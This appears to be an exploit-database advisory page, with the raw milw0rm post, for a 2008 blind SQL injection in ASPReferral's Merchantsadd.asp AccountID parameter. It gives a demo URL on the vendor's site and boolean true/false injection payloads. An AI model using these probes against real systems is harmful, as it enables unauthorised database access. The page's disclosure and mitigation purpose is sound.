Merchantsadd.asp AccountID Blind SQL Injection Vulnerability

vendor:

ASPReferral

by:

Y3d D3v!L

8.8

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: ASPReferral

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Merchantsadd.asp AccountID Blind SQL Injection Vulnerability

A Blind SQL Injection vulnerability was discovered in the Merchantsadd.asp page of ASPReferral software from www.activewebsoftwares.com. An attacker can exploit this vulnerability to gain access to the database and execute malicious SQL queries.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

[~] ----------------------------Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…------------------------------
 [~]Tybe:(Merchantsadd.asp AccountID) Blind SQL Injection Vulnerability
   
 [~]Vendor:www.activewebsoftwares.com
   
 [~]Software: ASPReferral
   
 [~]author: ((Ñ3d D3v!L))
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~] -----------------------------------------------------------
   
 [~]3xpL0!7 4 d3m0:
   
  http://www.activewebsoftwares.com/demoaspreferral/Merchantsadd.asp?AccountID={bL!ND}
   
 [~] 8L!/\/D:
   
  7Ru3 : Merchantsadd.asp?AccountID= 1 and 1=1
  f4L53: Merchantsadd.asp?AccountID= 1 and 1=2
   
   
 
[~]--------------------------------------------------------------------------------
  
  [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &Ø§Ù„Ø²Ù‡ÙŠØ±ÙŠ
  [~]
  [~] spechial thanks : dolly & 7am3m & Ø¹Ù…Ø§Ø¯ & {str0ke}
  [~]
  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
  [~]
  [~] xp10.biz & ahacker.biz
  [~]
  
[~]--------------------------------------------------------------------------------

# milw0rm.com [2008-11-29]